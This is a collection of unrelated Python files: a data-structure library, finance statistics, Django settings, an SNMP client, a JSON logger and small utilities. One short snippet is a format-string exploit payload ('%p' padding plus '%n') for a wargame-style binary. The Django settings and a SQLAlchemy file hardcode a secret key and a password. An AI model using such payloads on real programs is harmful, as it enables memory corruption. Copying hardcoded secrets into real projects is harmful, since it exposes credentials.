""" MetaClass for Structure Type """
def __new__(mcs, name, bases, ns, endian=None):
if name != 'DataStructure':
if '__annotations__' in ns:
for key, value in ns['__annotations__'].items():
if isinstance(value, type):
value = ns['__annotations__'][key] = value()
if not isinstance(value, (Struct, Int, IntBits, Float, String, Bytes, Array)):
raise Exception()
if endian and isinstance(value, (Int, Float)):
value.endian = endian
# create class attribute with default value
ns[key] = value.default
else:
annotations = {}
for key, value in ns.items():
# ignore hidden class attributes
if key in set(dir(type(name, (object,), {}))) or (key.startswith('_') and key.endswith('_')):
continue
# ignore methods and properties
if isinstance(value, type(Struct.validate)) or isinstance(value, staticmethod) or \
isinstance(value, classmethod) or isinstance(value, property):
continue
# convert class to objects
if isinstance(value, type):
value = value()
if not isinstance(value, (Struct, Int, IntBits, String, Bytes, Array)):
raise Exception()
annotations[key] = value
ns[key] = value.default
ns['__annotations__'] = annotations
return super().__new__(mcs, name, bases, ns)
########################################################################################################################
# The base DataStructure class
########################################################################################################################
class DataStructure(metaclass=MetaStructure):
def __init__(self, **kwargs):
"""
"""
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if name in kwargs:
value = metadata.validate(kwargs[name])
else:
value = metadata.default
if isinstance(metadata, Bytes) and value is None:
value = bytearray([metadata.empty] * metadata.size)
self.__dict__[name] = value
def __getitem__(self, key):
if not isinstance(key, str):
raise KeyError()
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if metadata.name == key:
key = name
break
if key not in self.__dict__:
raise KeyError()
return getattr(self, key)
def __setitem__(self, key, value):
if not isinstance(key, str):
raise KeyError()
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
if metadata.name == key:
key = name
break
if key not in self.__dict__:
raise KeyError()
setattr(self, key, value)
def __setattr__(self, key, value):
if key in self.__dict__:
annotations = getattr(self.__class__, '__annotations__')
self.__dict__[key] = annotations[key].validate(value)
else:
prop_obj = getattr(self.__class__, key, None)
if isinstance(prop_obj, property):
if prop_obj.fset is None:
raise AttributeError("Property '{}' has not implemented setter".format(key))
prop_obj.fset(self, value)
else:
# super(DataStructure, self).__setattr__(key, value)
raise AttributeError("Add new attribute into object is forbidden")
def __contains__(self, key):
return True if isinstance(key, str) and key in self.__dict__.keys() else False
def __iter__(self):
return self.__dict__.__iter__()
def __len__(self):
return len(self.__dict__)
def __eq__(self, obj):
if not isinstance(obj, DataStructure):
return False
for key, value in self.__dict__.items():
if key not in obj or value != obj[key]:
return False
return True
def update(self):
""" Update exporting data
Implement in child class if need do some changes before export
"""
pass
def validate(self):
""" Validate parsed data
Implement in child class if need do validate parsed data
"""
pass
def raw_size(self) -> int:
size = 0
index = 0
bsize = 0
items = getattr(self.__class__, '__annotations__', {})
names = tuple(items.keys())
while index < len(items):
name = names[index]
mdata = items[name]
index += 1
if isinstance(mdata, IntBits) and bsize < (mdata.offset + mdata.bits):
bsize = mdata.offset + mdata.bits
if index < len(items):
continue
if bsize > 0:
size += (bsize // 8) + 1 if bsize % 8 else bsize // 8
bsize = 0
continue
size += mdata.offset
if isinstance(mdata, Struct):
value = getattr(self, name)
size += value.raw_size()
if isinstance(mdata, Bytes):
value = getattr(self, name)
size += len(value)
else:
size += mdata.size
return size
def info(self, tabsize: int = 4, offset: int = 0, align: int = 0, show_all: bool = False) -> str:
"""
:param tabsize:
:param offset:
:param align:
:param show_all:
:return:
"""
self.update()
msg = str()
if self.__doc__:
msg += loff(offset, tabsize, '[ ' + self.__doc__ + ' ]\n')
for name, metadata in getattr(self.__class__, '__annotations__', {}).items():
value = getattr(self, name)
if name.startswith('_'):
name = name.lstrip('_')
if not hasattr(self, name) and not show_all:
continue
if metadata.name:
name = metadata.name
if metadata.description is not None:
msg += loff(offset, tabsize, "# {}\n".format(metadata.description))
if hasattr(metadata, 'print_format') and callable(metadata.print_format):
msg += metadata.print_format(name, value, tabsize, offset, align)
else:
if isinstance(metadata, Struct):
msg += loff(offset, tabsize, "{}:\n".format(name))
msg += value.info(tabsize, offset + 1, align, show_all)
elif isinstance(metadata, Array):
msg += fmt_array(name, metadata, value, tabsize, offset)
elif isinstance(metadata, Bytes):
msg += fmt_bytes(name, metadata, value, tabsize, offset)
elif isinstance(metadata, Int):
msg += fmt_int(name, metadata, value, tabsize, offset, align)
elif isinstance(metadata, IntBits):
msg += fmt_int(name, metadata, value, tabsize, offset, align)
else:
msg += fmt_string(name, metadata, value, tabsize, offset, align)
return msg
def export(self, empty: int = 0x00, update: bool = True, ignore: Optional[list] = None) -> bytes:
"""
:param empty:
:param update:
:param ignore:
:return:
"""
assert 0 <= empty <= 0xFF
index = 0
raw_data = b''
ib_range = 0
ib_values = []
ib_mdatas = []
items = getattr(self.__class__, '__annotations__', {})
if ignore:
items = {k: v for k, v in items.items() if k not in ignore}
names = tuple(items.keys())
if update:
self.update()
while index < len(items):
name = names[index]
mdata = items[name]
value = getattr(self, name)
index += 1
if isinstance(mdata, IntBits):
ib_values.append(value)
ib_mdatas.append(mdata)
if ib_range < (mdata.offset + mdata.bits):
ib_range = mdata.offset + mdata.bits
if index < len(items):
continue
if ib_values:
length = (ib_range // 8) + 1 if ib_range % 8 else ib_range // 8
raw_value = 0
for i, m in enumerate(ib_mdatas):
raw_value |= m.encode(ib_values[i])
raw_data += raw_value.to_bytes(length=length, byteorder='little', signed=False)
ib_range = 0
ib_values = []
ib_mdatas = []
else:
raw_data += bytes([empty] * mdata.offset)
raw_data += value.export(empty, update) if isinstance(mdata, Struct) else mdata.pack(value)
return raw_data
@classmethod
def parse(cls, data: bytes, offset: int = 0):
"""
:param data:
:param offset:
:return:
"""
if len(data) <= offset:
raise Exception()
index = 0
kwargs = {}
ib_range = 0
ib_names = []
ib_mdatas = []
items = cls.__annotations__
names = tuple(items.keys())
while index < len(items):
name = names[index]
mdata = items[name]
index += 1
if isinstance(mdata, IntBits):
ib_names.append(name)
ib_mdatas.append(mdata)
if ib_range < (mdata.offset + mdata.bits):
ib_range = mdata.offset + mdata.bits
if index < len(items):
continue
if ib_range:
length = (ib_range // 8) + 1 if ib_range % 8 else ib_range // 8
raw_value = int.from_bytes(data[offset: offset + length], byteorder='little', signed=False)
for i, m in enumerate(ib_mdatas):
kwargs[ib_names[i]] = m.decode(raw_value)
offset += length
else:
offset += mdata.offset
if isinstance(mdata, Struct):
value = mdata.struct.parse(data, offset)
offset += value.raw_size()
elif isinstance(mdata, Bytes):
length = mdata.length
if isinstance(length, str):
il = kwargs
for m in mdata.length.split('.'):
if not il or m not in il:
raise Exception()
il = il[m]
length = il
value = bytearray(data[offset: offset + length])
offset += length
else:
value = mdata.unpack(data, offset)
offset += mdata.size
kwargs[name] = value
obj = cls(**kwargs)
obj.validate()
return obj
########################################################################################################################
# The Struct Type as DataStructure container
########################################################################################################################
class Struct:
__slots__ = ('struct', 'offset', 'name', 'description')
def __init__(self, struct: MetaStructure, offset: int = 0, name: Optional[str] = None, desc: Optional[str] = None):
assert issubclass(struct, DataStructure)
self.name = name
self.offset = offset
self.struct = struct
self.description = desc
@property
def default(self):
return self.struct()
def validate(self, value):
if not isinstance(value, self.struct):
raise TypeError()
return value
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This script performs the Kolmogorov-Smirnov test for invariance on the
# time intervals between subsequent events in high frequency trading.
# -
# ## For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=exer-expiid-copy-1).
# +
# ## Prepare the environment
# +
import os
import os.path as path
import sys
sys.path.append(path.abspath('../../functions-legacy'))
from numpy import where, diff, array
from scipy.io import loadmat
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
plt.style.use('seaborn')
from CONFIG import GLOBAL_DB, TEMPORARY_DB
from ARPM_utils import save_plot, date_mtop, struct_to_dict, time_mtop
from TestKolSmirn import TestKolSmirn
from InvarianceTestKolSmirn import InvarianceTestKolSmirn
from TradeQuoteProcessing import TradeQuoteProcessing
# -
# ## Upload the database
# +
try:
db = loadmat(os.path.join(GLOBAL_DB, 'db_US_10yr_Future_quotes_and_trades'),squeeze_me=True)
except FileNotFoundError:
db = loadmat(os.path.join(TEMPORARY_DB, 'db_US_10yr_Future_quotes_and_trades'),squeeze_me=True)
quotes = struct_to_dict(db['quotes'], as_namedtuple=False)
trades = struct_to_dict(db['trades'], as_namedtuple=False)
# -
# ## Process the time series, refining the raw data coming from the database
# +
dates_quotes = quotes['time_names'] #
t = quotes['time'] # time vector of quotes
p_bid = quotes['bid'] # bid prices
p_ask = quotes['ask'] # ask prices
q_bid = quotes['bsiz'] # bid volumes
q_ask = quotes['asiz'] # ask volumes
dates_trades = trades['time_names'] #
t_k = trades['time'] # time vector of trades
p_last = trades['price'] # last transaction prices
delta_q = trades['siz'] # flow of traded contracts' volumes
delta_sgn = trades['aggress'] # trade sign flow
match = trades[
'mtch'] # match events: - the "1" value indicates the "start of a match event" while zeros indicates the "continuation of a match event"
# - the db is ordered such that the start of a match event is in the last column corresponding to that event
t, _, _, _, _, _, t_k, *_ = TradeQuoteProcessing(t, dates_quotes, q_ask, p_ask, q_bid, p_bid, t_k, dates_trades,
p_last, delta_q, delta_sgn, match)
t = t.flatten()
t_k = t_k.flatten()
# ## Compute the gaps between subsequent events
k_0 = where(t_k >= t[0])[0][0] # index of the first trade within the time window
k_1 = where(t_k <= t[len(t)-1])[0][-1] # index of the last trade within the time window
t_ms = array([time_mtop(i) for i in t_k[k_0:k_1+1]])
t_k = array([3600*i.hour+60*i.minute+i.second+i.microsecond/1e6 for i in t_ms])
delta_t_k = diff(t_k).reshape(1,-1) # gaps
# -
# ## Perform the Kolmogorov-Smirnov test
s_1, s_2, int, F_1, F_2, up, low = TestKolSmirn(delta_t_k)
# ## Plot the results of the IID test
# +
# position settings
pos = {}
pos[1] = [0.1300, 0.74, 0.3347, 0.1717]
pos[2] = [0.5703, 0.74, 0.3347, 0.1717]
pos[3] = [0.1300, 0.11, 0.7750, 0.5]
pos[4] = [0.03, 1.71]
# create figure
f = figure()
InvarianceTestKolSmirn(delta_t_k, s_1, s_2, int, F_1, F_2, up, low, pos, 'Kolmogorov-Smirnov invariance test',
[-0.3, 0]);
# save_plot(ax=plt.gca(), extension='png', scriptname=os.path.basename('.')[:-3], count=plt.get_fignums()[-1])
|
# using argparse library from a file
import argparse
parser = argparse.ArgumentParser(
prog="fromfile_example",
usage="%(prog)s [options] @file_name",
fromfile_prefix_chars="@",
description="getting arguments from file",
epilog="enjoy python * - *",
)
parser.add_argument("a", help="a first argument")
parser.add_argument("b", help="a second argument")
parser.add_argument("c", help="a third argument")
parser.add_argument("d", help="a fourth argument")
parser.add_argument("e", help="a fifth argument")
parser.add_argument(
"-v", "--verbose", action="store_true", help="an optional argument"
)
args = parser.parse_args()
print("if u read this line, that means u provided all the parameters")
test = args.a
test2 = args.b
test3 = args.c
test4 = args.d
test5 = args.e
print(" ".join(c for c in [test, test2, test3, test4, test5]))
|
import os
import logging.config
from django.core.urlresolvers import reverse_lazy
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Wilfred Hughes', '[email protected]'),
)
MANAGERS = ADMINS
PROJECT_ROOT = os.path.dirname(__file__)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.getenv('DB_PATH', os.path.join(PROJECT_ROOT, 'picky.db')),
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, "static"),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = os.environ.get(
'SECRET_KEY',
'z9ti4&cb5(+)vqhw%!*)fd_q_2ig9jldeaogpddjw@w%488l=)')
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.request",
"django.contrib.messages.context_processors.messages",
"picky.site_config.context_processors.include_config",
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'social_auth.backends.google.GoogleBackend',
'django.contrib.auth.backends.ModelBackend',
)
SOCIAL_AUTH_PIPELINE = (
# default
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'social_auth.backends.pipeline.user.update_user_details',
# customisation
'picky.users.social_auth.new_users_inactive'
)
LOGIN_URL = reverse_lazy('login_picker')
LOGIN_REDIRECT_URL = reverse_lazy('index')
LOGIN_ERROR_URL = reverse_lazy('user_not_active')
SOCIAL_AUTH_FORCE_POST_DISCONNECT = True
ROOT_URLCONF = 'picky.urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_ROOT, 'templates'),
)
INSTALLED_APPS = (
# django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# third party apps
'django_nose',
'raven.contrib.django.raven_compat',
'social_auth',
'haystack',
'debug_toolbar',
'django_extensions',
# picky apps
'picky.pages',
'picky.comments',
'picky.users',
'picky.site_config',
)
if os.getenv('DUMMY_SEARCH', False):
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
else:
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'whoosh_index'),
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
LOGGING_CONFIG = None
LOG_LEVEL = os.getenv('DJANGO_LOG_LEVEL', 'info').upper()
# Based on
# https://www.digitalocean.com/community/tutorials/how-to-build-a-django-and-gunicorn-application-with-docker
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {
'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'console',
},
},
'loggers': {
'': {
'level': LOG_LEVEL,
'handlers': ['console'],
},
},
})
INTERNAL_IPS = ('127.0.0.1',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '[::1]']
if os.getenv('VIRTUAL_HOST'):
ALLOWED_HOSTS.append(os.getenv('VIRTUAL_HOST'))
if os.getenv('LETSENCRYPT_HOST'):
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
WSGI_APPLICATION = "picky.wsgi.application"
try:
from live_settings import *
except ImportError:
pass
|
# Generated by Django 3.0.6 on 2020-07-12 08:31
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("checkerapp", "0027_auto_20200712_0829")]
operations = [
migrations.RemoveField(model_name="alertplugin", name="custom_plugin"),
migrations.AddField(
model_name="pluginlist",
name="custom_plugin",
field=models.BooleanField(default=True),
),
]
|
import re, nltk
def word_count(raw, min_length = 1):
""" Function to count the number of words in a passage of text.
Supplying parameter 'min_length' gives number of words with
at least min_length letters.
"""
tokens = nltk.word_tokenize(raw)
return len([word for word in tokens if len(word) >= min_length])
def number_count(raw):
""" Function to count the number of numbers appearing in a
passage of text.
"""
results = re.findall(r'\b(?<=-)?[,0-9\.]+(?=\s)', raw)
results = [result for result in results
if not re.match(r'(199|20[01])\d', result)
and re.search(r'[0-9]', result)]
return len(results)
def sent_count(raw):
"""
Function to count the number of sentences in a passage.
"""
sent_tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
sents = sent_tokenizer.tokenize(raw)
return len(sents)
|
# nm format-two | grep changeme
target = "\x68\x98\x04\x08"
diff = len("AAAAffffd896.100.0.f7f84b67.ffffd6e0.ffffd6c8.80485a0.ffffd5c0.ffffd896.100.3e8.41414141".split("."))
payload = target + "%p" * (diff - 1) + "%n"
print payload
|
__all__ = "Snmp"
import ipaddress
from types import TracebackType
from typing import Any, List, Optional, Tuple, Type, Union
from .connection import SnmpConnection
from .exceptions import SnmpUnsupportedValueType
from .message import (
GetBulkRequest,
GetNextRequest,
GetRequest,
SetRequest,
SnmpMessage,
SnmpVarbind,
SnmpVersion,
)
class Snmp(SnmpConnection):
__slots__ = ("version", "community", "non_repeaters", "max_repetitions")
def __init__(
self,
*,
version: SnmpVersion = SnmpVersion.v2c,
community: str = "public",
non_repeaters: int = 0,
max_repetitions: int = 10,
**kwargs: Any,
) -> None:
super().__init__(**kwargs)
self.version: SnmpVersion = version
self.community: str = community
self.non_repeaters: int = non_repeaters
self.max_repetitions: int = max_repetitions
def __enter__(self) -> "Snmp":
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
self.close()
return None
async def _send(self, message: SnmpMessage) -> List[SnmpVarbind]:
if self._protocol is None:
await self._connect()
assert self._protocol
assert self._peername is not None
return await self._protocol._send(
message,
self._peername[:2] if isinstance(self._peername, tuple) else self._peername,
)
async def get(self, oids: Union[str, List[str]]) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
message = SnmpMessage(
self.version, self.community, GetRequest([SnmpVarbind(oid) for oid in oids])
)
return await self._send(message)
async def get_next(self, oids: Union[str, List[str]]) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
message = SnmpMessage(
self.version,
self.community,
GetNextRequest([SnmpVarbind(oid) for oid in oids]),
)
return await self._send(message)
async def get_bulk(
self,
oids: Union[str, List[str]],
*,
non_repeaters: Optional[int] = None,
max_repetitions: Optional[int] = None,
) -> List[SnmpVarbind]:
if isinstance(oids, str):
oids = [oids]
nr: int = self.non_repeaters if non_repeaters is None else non_repeaters
mr: int = self.max_repetitions if max_repetitions is None else max_repetitions
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(oid) for oid in oids], nr, mr),
)
return await self._send(message)
async def walk(self, oid: str) -> List[SnmpVarbind]:
varbinds: List[SnmpVarbind] = []
message = SnmpMessage(
self.version, self.community, GetNextRequest([SnmpVarbind(oid)])
)
base_oid = oid if oid.startswith(".") else f".{oid}"
vbs = await self._send(message)
next_oid = vbs[0].oid
if not next_oid.startswith(f"{base_oid}."):
message = SnmpMessage(
self.version, self.community, GetRequest([SnmpVarbind(base_oid)])
)
return await self._send(message)
varbinds.append(vbs[0])
while True:
message = SnmpMessage(
self.version, self.community, GetNextRequest([SnmpVarbind(next_oid)])
)
vbs = await self._send(message)
next_oid = vbs[0].oid
if not next_oid.startswith(f"{base_oid}."):
break
varbinds.append(vbs[0])
return varbinds
async def set(
self, varbinds: List[Tuple[str, Union[int, str, bytes, ipaddress.IPv4Address]]]
) -> List[SnmpVarbind]:
for varbind in varbinds:
if not isinstance(varbind[1], (int, str, bytes, ipaddress.IPv4Address)):
raise SnmpUnsupportedValueType(
f"Only int, str, bytes and ip address supported, got {type(varbind[1])}"
)
message = SnmpMessage(
self.version,
self.community,
SetRequest([SnmpVarbind(oid, value) for oid, value in varbinds]),
)
return await self._send(message)
async def bulk_walk(
self,
oid: str,
*,
non_repeaters: Optional[int] = None,
max_repetitions: Optional[int] = None,
) -> List[SnmpVarbind]:
nr: int = self.non_repeaters if non_repeaters is None else non_repeaters
mr: int = self.max_repetitions if max_repetitions is None else max_repetitions
base_oid: str = oid if oid.startswith(".") else f".{oid}"
varbinds: List[SnmpVarbind] = []
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(base_oid)], nr, mr),
)
vbs: List[SnmpVarbind] = await self._send(message)
next_oid: str = ""
for i, vb in enumerate(vbs):
if not vb.oid.startswith(f"{base_oid}.") or vb.value is None:
if i == 0:
message = SnmpMessage(
self.version,
self.community,
GetRequest([SnmpVarbind(base_oid)]),
)
return await self._send(message)
return varbinds
varbinds.append(vb)
next_oid = vb.oid
while next_oid:
message = SnmpMessage(
self.version,
self.community,
GetBulkRequest([SnmpVarbind(next_oid)], nr, mr),
)
vbs = await self._send(message)
for vb in vbs:
if not vb.oid.startswith(f"{base_oid}.") or vb.value is None:
next_oid = ""
break
varbinds.append(vb)
next_oid = vb.oid
return varbinds
|
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: José Sánchez-Gallego
# @Date: Mar 8, 2018
# @Filename: hub.py
# @License: BSD 3-Clause
# @Copyright: José Sánchez-Gallego
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import re
from . import device
class HubConnection(device.TCPDevice):
"""A device connection to the Hub.
This class implments a `~device.TCPDevice` connection to the Hub that
listens for new keywords and updates a datamodel.
Parameters:
host (str):
The host where the hub is running.
port (int):
The port on which the hub is running.
use_datamodel (bool):
Whether the connection should listen for new keywords from the
Hub and update a datamodel.
datamodel_casts (dict):
A dictionary of the form ``'actor.keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'guider.cartridgeLoaded': int}``.
datamodel_callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
function to call when the keywords gets updated.
"""
def __init__(self, host, port=6093, use_datamodel=True,
datamodel_casts=None, datamodel_callbacks=None, **kwargs):
device.TCPDevice.__init__(self, name='hub', host=host, port=port, **kwargs)
self.connect()
if use_datamodel:
self.datamodel = HubModel(casts=datamodel_casts, callbacks=datamodel_callbacks)
else:
self.datamodel = None
def init(self, userCmd=None, timeLim=None, getStatus=True):
pass
def handleReply(self, reply_str):
if self.datamodel is None:
return
reply_str = reply_str.strip()
if not reply_str:
return
matched = re.match(r'^(?P<commanderID>.+) (?P<cmdID>[0-9]+) '
r'(?P<userID>.+) (?P<severity>[a-z,A-Z,:]) '
r'(?P<cmd>.+)$', reply_str)
if matched:
group = matched.groupdict()
if group['userID'] in ['cmds', 'keys']:
return
# keypairs = re.findall('(.+)=(.+);*', group['cmd'])
keyvalue_pairs = map(lambda x: x.strip(), group['cmd'].split(';'))
for pair in keyvalue_pairs:
if '=' not in pair:
key = pair
value = None
else:
key, value = pair.split('=', 1)
actor = group['userID']
if actor not in self.datamodel:
self.datamodel.add_model(actor)
self.datamodel[actor][key] = value
class ActorModel(dict):
"""A dictionary defining a datamodel for an actor.
Parameters:
name (str):
The name of the actor.
casts (dict):
A dictionary of the form ``'keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
function to call when the keywords gets updated.
"""
def __init__(self, name, casts=None, callbacks=None):
super(ActorModel, self).__init__()
self.name = name
self.casts = casts or dict()
self.callbacks = callbacks or dict()
def __setitem__(self, key, value):
def try_cast(value):
try:
return self.casts[key](value)
except ValueError:
return value
unquoted = list(map(lambda xx: re.sub(r'^"|"$', '', xx), str(value).split(',')))
if key in self.casts:
dict.__setitem__(self, key, list(map(try_cast, unquoted)))
else:
dict.__setitem__(self, key, unquoted)
if key in self.callbacks:
self.callbacks[key](dict.__getitem__(self, key))
class HubModel(dict):
"""A dictionary defining a datamodel for multiple actors.
Parameters:
casts (dict):
A dictionary of the form ``'actor.keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'guider.cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``casts`` with a callback function to
call when the keywords gets updated.
"""
def __init__(self, casts=None, callbacks=None):
casts = casts or dict()
callbacks = callbacks or dict()
super(HubModel, self).__init__()
# Creates a list of all actors defined in casts or callbacks
actors = list(set(self._parse_actors(casts) + self._parse_actors(callbacks)))
for actor in actors:
# For each actor, creates a list of casts and callbacks stripping
# the actor part from the dictionary.
# E.g., {'guider.cartridgeLoaded': int} -> {'cartridgeLoaded': int}
actor_casts = dict((keyword.split('.')[1], cast)
for keyword, cast in casts.items()
if keyword.split('.')[0] == actor)
actor_cbs = dict((keyword.split('.')[1], cb)
for keyword, cb in callbacks.items()
if keyword.split('.')[0] == actor)
self.add_model(actor, casts=actor_casts, callbacks=actor_cbs)
@staticmethod
def _parse_actors(values):
return list(map(lambda xx: xx.split('.')[0], list(values)))
def add_model(self, actor_name, casts={}, callbacks={}):
"""Adds a new actor to the datamodel.
Parameters:
actor_name (str):
The name of the actor.
casts (dict):
A dictionary of the form ``'keyword': func`` that defines
how to cast the values of that keyword.
E.g., ``{'cartridgeLoaded': int}``.
callbacks (dict):
A dictionary, similar to ``datamodel_casts`` with a callback
function to call when the keywords gets updated.
"""
model = ActorModel(actor_name, casts=casts, callbacks=callbacks)
self[actor_name] = model
def __setitem__(self, key, value):
if key in self:
raise ValueError('actor {!r} already in the model'.format(value))
assert isinstance(value, ActorModel), 'value being set must be an ActorModel'
dict.__setitem__(self, key, value)
|
#!/usr/bin/env python3
import json
from .LogPrimFactory import LogPrimFactory
class JSONLogPrimFactory(LogPrimFactory):
"""
JSON Log Primitive Factory.
Log Format: JSON (from base dictionary object)
Functions
* logObj - json dump the base logObj output
* ... LogPrimFactories
"""
def logObj(self, *args, **kwargs):
"""
Take the base class output (a dictionary) and use json.dumps to pass back stringified JSON
"""
return json.dumps(super().logObj(*args, **kwargs))
|
#!/usr/bin/env python
#:coding=utf-8:
#:tabSize=2:indentSize=2:noTabs=true:
#:folding=explicit:collapseFolds=1:
import re, simplejson, types, jsonschema
from jsonschema.validator import JSONSchemaValidator
class FunctionValidator(JSONSchemaValidator):
'''FunctionValidator extends the JSONSchemaValidator to support Javascript
functions within JSON schema. This class demonstrates how to extend
JSONSchema and the Validator to add types and JSONSchema properties
to be validated.'''
def validate_type(self, x, fieldname, schema, fieldtype=None):
'''Performs very simple validation on the value of the function property to
make sure it is a Javascript function'''
if fieldtype == "function":
r = re.compile("^function")
value = x.get(fieldname)
if not r.match(value):
raise ValueError("Value for field '%s' is not a valid Javascript function definition" % fieldname)
else:
return x
else:
JSONSchemaValidator.validate_type(self, x, fieldname, schema, fieldtype)
def validate_class(self, x, fieldname, schema, classname=None):
if classname is not None and \
not isinstance(classname, types.StringType) and \
not isinstance(classname, types.UnicodeType):
raise ValueError("The classname %s must be a string" % repr(classname));
def main():
import sys
if len(sys.argv) == 1:
infile = sys.stdin
schemafile = sys.stdout
elif len(sys.argv) == 2:
if sys.argv[1] == "--help":
raise SystemExit("%s [infile [schemafile]]" % (sys.argv[0],))
infile = open(sys.argv[1], 'rb')
schemafile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
schemafile = open(sys.argv[2], 'rb')
else:
raise SystemExit("%s [infile [schemafile]]" % (sys.argv[0],))
try:
obj = simplejson.load(infile)
schema = simplejson.load(schemafile)
jsonschema.validate(obj, schema, validator_cls=FunctionValidator)
except ValueError, e:
raise SystemExit(e)
if __name__=='__main__':
main()
|
import requests
import json
r = requests.get('https://dex.binance.org/api/v1/ticker/24hr?symbol=MTXLT-286_BNB')
if r.status_code == 200:
print('Success!')
else:
print('Error has occured')
packages_json = r.json()
tixlPrice = packages_json[0]['lastPrice']
packages_str = json.dumps(packages_json, indent=2)
print('MTXLT price is ' + tixlPrice + ' BNB')
|
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.orm
# Global Setup
user = "postgres"
password = "python"
host = "localhost"
port = 5432
database = "postgres"
url = 'postgresql://{}:{}@{}:{}/{}'
db_string = url.format(user, password, host, port, database)
db = sqlalchemy.create_engine(db_string, echo=True)
base = sqlalchemy.ext.declarative.declarative_base()
class People(base):
__tablename__ = 'people'
PersonalNumber = sqlalchemy.Column(sqlalchemy.String, primary_key=True)
FirstName = sqlalchemy.Column(sqlalchemy.String)
LastName = sqlalchemy.Column(sqlalchemy.String)
StreetAddress = sqlalchemy.Column(sqlalchemy.String)
City = sqlalchemy.Column(sqlalchemy.String)
